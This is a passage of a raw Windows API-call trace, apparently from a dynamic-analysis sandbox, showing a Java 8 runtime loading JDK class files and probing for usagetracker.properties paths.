lpNumberOfBytesRead=0x208d7b0, lpOverlapped=0x0 | out: lpBuffer=0x208d830*, lpNumberOfBytesRead=0x208d7b0*=0x1e, lpOverlapped=0x0) returned 1 [0100.673] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312a2b8, lpNewFilePointer=0x208d840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d840*=51552952) returned 1 [0100.673] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x3e6, lpNumberOfBytesRead=0x208d810, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d810*=0x3e6, lpOverlapped=0x0) returned 1 [0100.674] free (_Block=0x12222170) [0100.674] free (_Block=0x1228eb90) [0100.683] strlen (_Str="java/lang/invoke/MemberName$Factory.class") returned 0x29 [0100.683] malloc (_Size=0x48) returned 0x1228e780 [0100.683] malloc (_Size=0xa0) returned 0x12225f10 [0100.683] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341972a, lpNewFilePointer=0x208e450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e450*=54630186) returned 1 [0100.683] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e420, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208e420*=0xa0, lpOverlapped=0x0) returned 1 [0100.684] malloc (_Size=0x2a) returned 0x12220ee0 [0100.684] free (_Block=0x12225f10) [0100.685] strlen (_Str="java/lang/invoke/MemberName$Factory.class") returned 0x29 [0100.685] strcpy (in: _Dest=0x208e5d0, _Source="java/lang/invoke/MemberName$Factory.class" | out: _Dest="java/lang/invoke/MemberName$Factory.class") returned="java/lang/invoke/MemberName$Factory.class" [0100.685] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3128c64, lpNewFilePointer=0x208e050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e050*=51547236) returned 1 [0100.685] ReadFile (in: hFile=0x134, lpBuffer=0x208e0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e020, lpOverlapped=0x0 | out: lpBuffer=0x208e0a0*, lpNumberOfBytesRead=0x208e020*=0x1e, lpOverlapped=0x0) returned 1 [0100.687] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3128cab, lpNewFilePointer=0x208e0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0b0*=51547307) returned 1 [0100.687] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x15cd, lpNumberOfBytesRead=0x208e080, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208e080*=0x15cd, lpOverlapped=0x0) returned 1 [0100.688] free (_Block=0x12221ff0) [0100.688] free (_Block=0x1228eb40) [0100.697] strlen (_Str="java/lang/invoke/MethodHandleStatics.class") returned 0x2a [0100.697] malloc (_Size=0x48) returned 0x1228e280 [0100.697] malloc (_Size=0xa0) returned 0x12225f10 [0100.697] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34196d2, lpNewFilePointer=0x208e4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4a0*=54630098) returned 1 [0100.697] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e470, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208e470*=0xa0, lpOverlapped=0x0) returned 1 [0100.698] malloc (_Size=0x2b) returned 0x12221660 [0100.698] free (_Block=0x12225f10) [0100.698] strlen (_Str="java/lang/invoke/MethodHandleStatics.class") returned 0x2a [0100.698] strcpy (in: _Dest=0x208e620, _Source="java/lang/invoke/MethodHandleStatics.class" | out: _Dest="java/lang/invoke/MethodHandleStatics.class") returned="java/lang/invoke/MethodHandleStatics.class" [0100.698] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3127b88, lpNewFilePointer=0x208e0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0a0*=51542920) returned 1 [0100.699] ReadFile (in: hFile=0x134, lpBuffer=0x208e0f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e070, lpOverlapped=0x0 | out: lpBuffer=0x208e0f0*, lpNumberOfBytesRead=0x208e070*=0x1e, lpOverlapped=0x0) returned 1 [0100.700] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3127bd0, lpNewFilePointer=0x208e100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e100*=51542992) returned 1 [0100.700] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x1094, lpNumberOfBytesRead=0x208e0d0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208e0d0*=0x1094, lpOverlapped=0x0) returned 1 [0100.701] free (_Block=0x12220ee0) [0100.701] free (_Block=0x1228e780) [0100.712] malloc (_Size=0x48) returned 0x1228e690 [0100.712] malloc (_Size=0xa0) returned 0x12225f10 [0100.712] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419678, lpNewFilePointer=0x208dcb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcb0*=54630008) returned 1 [0100.712] ReadFile (in: hFile=0x134, lpBuffer=0x12225f10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc80, lpOverlapped=0x0 | out: lpBuffer=0x12225f10*, lpNumberOfBytesRead=0x208dc80*=0xa0, lpOverlapped=0x0) returned 1 [0100.713] malloc (_Size=0x2d) returned 0x12221820 [0100.714] strlen (_Str="java/lang/invoke/MethodHandleStatics$1.class") returned 0x2c [0100.714] strcpy (in: _Dest=0x208de30, _Source="java/lang/invoke/MethodHandleStatics$1.class" | out: _Dest="java/lang/invoke/MethodHandleStatics$1.class") returned="java/lang/invoke/MethodHandleStatics$1.class" [0100.714] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3127548, lpNewFilePointer=0x208d8b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8b0*=51541320) returned 1 [0100.714] ReadFile (in: hFile=0x134, lpBuffer=0x208d900, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d880, lpOverlapped=0x0 | out: lpBuffer=0x208d900*, lpNumberOfBytesRead=0x208d880*=0x1e, lpOverlapped=0x0) returned 1 [0100.715] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3127592, lpNewFilePointer=0x208d910, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d910*=51541394) returned 1 [0100.715] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x5f6, lpNumberOfBytesRead=0x208d8e0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d8e0*=0x5f6, lpOverlapped=0x0) returned 1 [0100.716] free (_Block=0x12221660) [0100.716] free (_Block=0x1228e280) [0100.771] malloc (_Size=0x48) returned 0x1228e730 [0100.771] malloc (_Size=0xa0) returned 0x21137a0 [0100.771] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341962d, lpNewFilePointer=0x208f3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f3b0*=54629933) returned 1 [0100.772] ReadFile (in: hFile=0x134, lpBuffer=0x21137a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f380, lpOverlapped=0x0 | out: lpBuffer=0x21137a0*, lpNumberOfBytesRead=0x208f380*=0xa0, lpOverlapped=0x0) returned 1 [0100.773] malloc (_Size=0x1e) returned 0x12221e70 [0100.773] strlen (_Str="sun/misc/PostVMInitHook.class") returned 0x1d [0100.773] strcpy (in: _Dest=0x208f530, _Source="sun/misc/PostVMInitHook.class" | out: _Dest="sun/misc/PostVMInitHook.class") returned="sun/misc/PostVMInitHook.class" [0100.773] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3127339, lpNewFilePointer=0x208efb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208efb0*=51540793) returned 1 [0100.773] ReadFile (in: hFile=0x134, lpBuffer=0x208f000, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ef80, lpOverlapped=0x0 | out: lpBuffer=0x208f000*, lpNumberOfBytesRead=0x208ef80*=0x1e, lpOverlapped=0x0) returned 1 [0100.774] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3127374, lpNewFilePointer=0x208f010, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f010*=51540852) returned 1 [0100.774] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x208efe0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208efe0*=0x1d4, lpOverlapped=0x0) returned 1 [0100.775] free (_Block=0x12221820) [0100.775] free (_Block=0x1228e690) [0100.783] strlen (_Str="sun/usagetracker/UsageTrackerClient.class") returned 0x29 [0100.783] malloc (_Size=0x48) returned 0x1228efa0 [0100.783] malloc (_Size=0xa0) returned 0x21137a0 [0100.783] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34195d6, lpNewFilePointer=0x208e6c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e6c0*=54629846) returned 1 [0100.783] ReadFile (in: hFile=0x134, lpBuffer=0x21137a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e690, lpOverlapped=0x0 | out: lpBuffer=0x21137a0*, lpNumberOfBytesRead=0x208e690*=0xa0, lpOverlapped=0x0) returned 1 [0100.784] malloc (_Size=0x2a) returned 0x12220ca0 [0100.784] strlen (_Str="sun/usagetracker/UsageTrackerClient.class") returned 0x29 [0100.785] strcpy (in: _Dest=0x208e840, _Source="sun/usagetracker/UsageTrackerClient.class" | out: _Dest="sun/usagetracker/UsageTrackerClient.class") returned="sun/usagetracker/UsageTrackerClient.class" [0100.785] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3124791, lpNewFilePointer=0x208e2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2c0*=51529617) returned 1 [0100.785] ReadFile (in: hFile=0x134, lpBuffer=0x208e310, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e290, lpOverlapped=0x0 | out: lpBuffer=0x208e310*, lpNumberOfBytesRead=0x208e290*=0x1e, lpOverlapped=0x0) returned 1 [0100.787] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31247d8, lpNewFilePointer=0x208e320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e320*=51529688) returned 1 [0100.787] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x2b61, lpNumberOfBytesRead=0x208e2f0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208e2f0*=0x2b61, lpOverlapped=0x0) returned 1 [0100.788] free (_Block=0x12221e70) [0100.788] free (_Block=0x1228e730) [0100.813] malloc (_Size=0x48) returned 0x1228e230 [0100.813] malloc (_Size=0xa0) returned 0x12291f00 [0100.813] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419579, lpNewFilePointer=0x208e0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0c0*=54629753) returned 1 [0100.813] ReadFile (in: hFile=0x134, lpBuffer=0x12291f00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e090, lpOverlapped=0x0 | out: lpBuffer=0x12291f00*, lpNumberOfBytesRead=0x208e090*=0xa0, lpOverlapped=0x0) returned 1 [0100.814] malloc (_Size=0x30) returned 0x12221820 [0100.815] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312410b, lpNewFilePointer=0x208dcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcc0*=51527947) returned 1 [0100.815] ReadFile (in: hFile=0x134, lpBuffer=0x208dd10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dc90, lpOverlapped=0x0 | out: lpBuffer=0x208dd10*, lpNumberOfBytesRead=0x208dc90*=0x1e, lpOverlapped=0x0) returned 1 [0100.816] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3124158, lpNewFilePointer=0x208dd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd20*=51528024) returned 1 [0100.816] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x639, lpNumberOfBytesRead=0x208dcf0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208dcf0*=0x639, lpOverlapped=0x0) returned 1 [0100.820] strlen (_Str="sun/usagetracker/UsageTrackerClient$1.class") returned 0x2b [0100.820] malloc (_Size=0x48) returned 0x1228e640 [0100.820] malloc (_Size=0xa0) returned 0x12291f00 [0100.820] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419520, lpNewFilePointer=0x208e000, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e000*=54629664) returned 1 [0100.820] ReadFile (in: hFile=0x134, lpBuffer=0x12291f00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dfd0, lpOverlapped=0x0 | out: lpBuffer=0x12291f00*, lpNumberOfBytesRead=0x208dfd0*=0xa0, lpOverlapped=0x0) returned 1 [0100.822] malloc (_Size=0x2c) returned 0x122219a0 [0100.822] strlen (_Str="sun/usagetracker/UsageTrackerClient$1.class") returned 0x2b [0100.822] strcpy (in: _Dest=0x208e180, _Source="sun/usagetracker/UsageTrackerClient$1.class" | out: _Dest="sun/usagetracker/UsageTrackerClient$1.class") returned="sun/usagetracker/UsageTrackerClient$1.class" [0100.823] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3123dab, lpNewFilePointer=0x208dc00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc00*=51527083) returned 1 [0100.823] ReadFile (in: hFile=0x134, lpBuffer=0x208dc50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dbd0, lpOverlapped=0x0 | out: lpBuffer=0x208dc50*, lpNumberOfBytesRead=0x208dbd0*=0x1e, lpOverlapped=0x0) returned 1 [0100.825] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3123df4, lpNewFilePointer=0x208dc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc60*=51527156) returned 1 [0100.825] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x317, lpNumberOfBytesRead=0x208dc30, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208dc30*=0x317, lpOverlapped=0x0) returned 1 [0100.825] free (_Block=0x12221820) [0100.826] free (_Block=0x1228e230) [0100.836] strlen (_Str="sun/usagetracker/UsageTrackerClient$4.class") returned 0x2b [0100.836] malloc (_Size=0x48) returned 0x1228e780 [0100.836] malloc (_Size=0xa0) returned 0x12291f00 [0100.836] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34194c7, lpNewFilePointer=0x208e650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e650*=54629575) returned 1 [0100.836] ReadFile (in: hFile=0x134, lpBuffer=0x12291f00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e620, lpOverlapped=0x0 | out: lpBuffer=0x12291f00*, lpNumberOfBytesRead=0x208e620*=0xa0, lpOverlapped=0x0) returned 1 [0100.837] malloc (_Size=0x2c) returned 0x12220ce0 [0100.837] strlen (_Str="sun/usagetracker/UsageTrackerClient$4.class") returned 0x2b [0100.837] strcpy (in: _Dest=0x208e7d0, _Source="sun/usagetracker/UsageTrackerClient$4.class" | out: _Dest="sun/usagetracker/UsageTrackerClient$4.class") returned="sun/usagetracker/UsageTrackerClient$4.class" [0100.837] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3123552, lpNewFilePointer=0x208e250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e250*=51524946) returned 1 [0100.837] ReadFile (in: hFile=0x134, lpBuffer=0x208e2a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e220, lpOverlapped=0x0 | out: lpBuffer=0x208e2a0*, lpNumberOfBytesRead=0x208e220*=0x1e, lpOverlapped=0x0) returned 1 [0100.838] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312359b, lpNewFilePointer=0x208e2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2b0*=51525019) returned 1 [0100.838] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x208e280, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208e280*=0x810, lpOverlapped=0x0) returned 1 [0100.839] free (_Block=0x122219a0) [0100.839] free (_Block=0x1228e640) [0100.850] strlen (_Str="sun/usagetracker/UsageTrackerClient$2.class") returned 0x2b [0100.850] malloc (_Size=0x48) returned 0x1228e140 [0100.850] malloc (_Size=0xa0) returned 0x12291f00 [0100.850] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341946e, lpNewFilePointer=0x208d7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7b0*=54629486) returned 1 [0100.850] ReadFile (in: hFile=0x134, lpBuffer=0x12291f00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d780, lpOverlapped=0x0 | out: lpBuffer=0x12291f00*, lpNumberOfBytesRead=0x208d780*=0xa0, lpOverlapped=0x0) returned 1 [0100.852] malloc (_Size=0x2c) returned 0x12221820 [0100.852] strlen (_Str="sun/usagetracker/UsageTrackerClient$2.class") returned 0x2b [0100.852] strcpy (in: _Dest=0x208d930, _Source="sun/usagetracker/UsageTrackerClient$2.class" | out: _Dest="sun/usagetracker/UsageTrackerClient$2.class") returned="sun/usagetracker/UsageTrackerClient$2.class" [0100.852] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3123242, lpNewFilePointer=0x208d3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3b0*=51524162) returned 1 [0100.852] ReadFile (in: hFile=0x134, lpBuffer=0x208d400, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d380, lpOverlapped=0x0 | out: lpBuffer=0x208d400*, lpNumberOfBytesRead=0x208d380*=0x1e, lpOverlapped=0x0) returned 1 [0100.853] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x312328b, lpNewFilePointer=0x208d410, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d410*=51524235) returned 1 [0100.853] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x2c7, lpNumberOfBytesRead=0x208d3e0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d3e0*=0x2c7, lpOverlapped=0x0) returned 1 [0100.854] free (_Block=0x12220ce0) [0100.855] free (_Block=0x1228e780) [0100.860] strlen (_Str="jdk/internal/util/EnvUtils.class") returned 0x20 [0100.861] malloc (_Size=0x48) returned 0x1228e690 [0100.861] malloc (_Size=0xa0) returned 0x12291f00 [0100.861] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x339672f, lpNewFilePointer=0x208c890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c890*=54093615) returned 1 [0100.861] ReadFile (in: hFile=0x134, lpBuffer=0x12291f00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c860, lpOverlapped=0x0 | out: lpBuffer=0x12291f00*, lpNumberOfBytesRead=0x208c860*=0xa0, lpOverlapped=0x0) returned 1 [0100.862] malloc (_Size=0x21) returned 0x12221ae0 [0100.862] strlen (_Str="jdk/internal/util/EnvUtils.class") returned 0x20 [0100.862] strcpy (in: _Dest=0x208ca10, _Source="jdk/internal/util/EnvUtils.class" | out: _Dest="jdk/internal/util/EnvUtils.class") returned="jdk/internal/util/EnvUtils.class" [0100.862] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x211f05c, lpNewFilePointer=0x208c490, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c490*=34730076) returned 1 [0100.862] ReadFile (in: hFile=0x134, lpBuffer=0x208c4e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c460, lpOverlapped=0x0 | out: lpBuffer=0x208c4e0*, lpNumberOfBytesRead=0x208c460*=0x1e, lpOverlapped=0x0) returned 1 [0100.865] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x211f09a, lpNewFilePointer=0x208c4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4f0*=34730138) returned 1 [0100.865] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0xca, lpNumberOfBytesRead=0x208c4c0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208c4c0*=0xca, lpOverlapped=0x0) returned 1 [0100.865] free (_Block=0x12221820) [0100.866] free (_Block=0x1228e140) [0100.869] malloc (_Size=0xc) returned 0x12293230 [0100.869] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0xf [0100.869] malloc (_Size=0xf) returned 0x12293070 [0100.870] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x12293070, nSize=0xf | out: lpBuffer="") returned 0xe [0100.870] strlen (_Str="C:\\ProgramData") returned 0xe [0100.870] free (_Block=0x12293070) [0100.870] free (_Block=0x12293230) [0100.872] strlen (_Str="sun/usagetracker/UsageTrackerClient$3.class") returned 0x2b [0100.872] malloc (_Size=0x48) returned 0x1228e5a0 [0100.872] malloc (_Size=0xa0) returned 0x12291f00 [0100.873] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418f7a, lpNewFilePointer=0x208d870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d870*=54628218) returned 1 [0100.873] ReadFile (in: hFile=0x134, lpBuffer=0x12291f00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d840, lpOverlapped=0x0 | out: lpBuffer=0x12291f00*, lpNumberOfBytesRead=0x208d840*=0xa0, lpOverlapped=0x0) returned 1 [0100.875] malloc (_Size=0x2c) returned 0x12220ae0 [0100.875] strlen (_Str="sun/usagetracker/UsageTrackerClient$3.class") returned 0x2b [0100.875] strcpy (in: _Dest=0x208d9f0, _Source="sun/usagetracker/UsageTrackerClient$3.class" | out: _Dest="sun/usagetracker/UsageTrackerClient$3.class") returned="sun/usagetracker/UsageTrackerClient$3.class" [0100.875] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3118886, lpNewFilePointer=0x208d470, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d470*=51480710) returned 1 [0100.876] ReadFile (in: hFile=0x134, lpBuffer=0x208d4c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d440, lpOverlapped=0x0 | out: lpBuffer=0x208d4c0*, lpNumberOfBytesRead=0x208d440*=0x1e, lpOverlapped=0x0) returned 1 [0100.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31188cf, lpNewFilePointer=0x208d4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d4d0*=51480783) returned 1 [0100.923] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x2cc, lpNumberOfBytesRead=0x208d4a0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d4a0*=0x2cc, lpOverlapped=0x0) returned 1 [0100.924] free (_Block=0x12221ae0) [0100.924] free (_Block=0x1228e690) [0100.930] wcslen (_String="C:\\ProgramData\\Oracle\\Java\\usagetracker.properties") returned 0x32 [0100.930] malloc (_Size=0x70) returned 0x1228fed0 [0100.930] wcscpy (in: _Dest=0x1228fed0, _Source="C:\\ProgramData\\Oracle\\Java\\usagetracker.properties" | out: _Dest="C:\\ProgramData\\Oracle\\Java\\usagetracker.properties") returned="C:\\ProgramData\\Oracle\\Java\\usagetracker.properties" [0100.930] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\usagetracker.properties", nBufferLength=0x9, lpBuffer=0x208db78, lpFilePart=0x208db70 | out: lpBuffer="", lpFilePart=0x208db70*=0x0) returned 0x33 [0100.930] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\usagetracker.properties" (normalized: "c:\\programdata\\oracle\\java\\usagetracker.properties"), fInfoLevelId=0x0, lpFileInformation=0x208d910 | out: lpFileInformation=0x208d910*(dwFileAttributes=0x208da10, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x6f6031c7, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x119b0bf0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2101000, nFileSizeHigh=0x0, nFileSizeLow=0xeb68)) returned 0 [0100.932] GetLastError () returned 0x2 [0100.932] free (_Block=0x1228fed0) [0100.933] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\management\\usagetracker.properties") returned 0x49 [0100.933] malloc (_Size=0x9e) returned 0x12291fa0 [0100.933] wcscpy (in: _Dest=0x12291fa0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\management\\usagetracker.properties" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\management\\usagetracker.properties") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\management\\usagetracker.properties" [0100.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\management\\usagetracker.properties", nBufferLength=0x9, lpBuffer=0x208db78, lpFilePart=0x208db70 | out: lpBuffer="", lpFilePart=0x208db70*=0x0) returned 0x4a [0100.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\management\\usagetracker.properties" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\management\\usagetracker.properties"), fInfoLevelId=0x0, lpFileInformation=0x208d910 | out: lpFileInformation=0x208d910*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x12291f00, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x2000018, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x18, nFileSizeLow=0x2000002)) returned 0 [0101.186] GetLastError () returned 0x2 [0101.186] free (_Block=0x12291fa0) [0101.187] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0101.187] malloc (_Size=0x800) returned 0x12293670 [0101.187] _wfullpath (in: _Buffer=0x12293670, _Path="C:\\Program Files\\Java\\jre1.8.0_171", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_171") returned="C:\\Program Files\\Java\\jre1.8.0_171" [0101.187] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0101.187] wcsncmp (_String1="C:\\P", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0101.187] wcslen (_String="C:\\Program Files") returned 0x10 [0101.188] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x208dc90 | out: lpFindFileData=0x208dc90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x91f9c39d, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x425b40 [0101.188] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0101.188] wcslen (_String="Program Files") returned 0xd [0101.188] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0101.188] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208dc90 | out: lpFindFileData=0x208dc90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x91f9c39d, cFileName="Java", cAlternateFileName="")) returned 0x426620 [0101.188] FindClose (in: hFindFile=0x426620 | out: hFindFile=0x426620) returned 1 [0101.188] wcslen (_String="Java") returned 0x4 [0101.188] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0101.188] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208dc90 | out: lpFindFileData=0x208dc90*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x91f9c39d, cFileName="jre1.8.0_171", 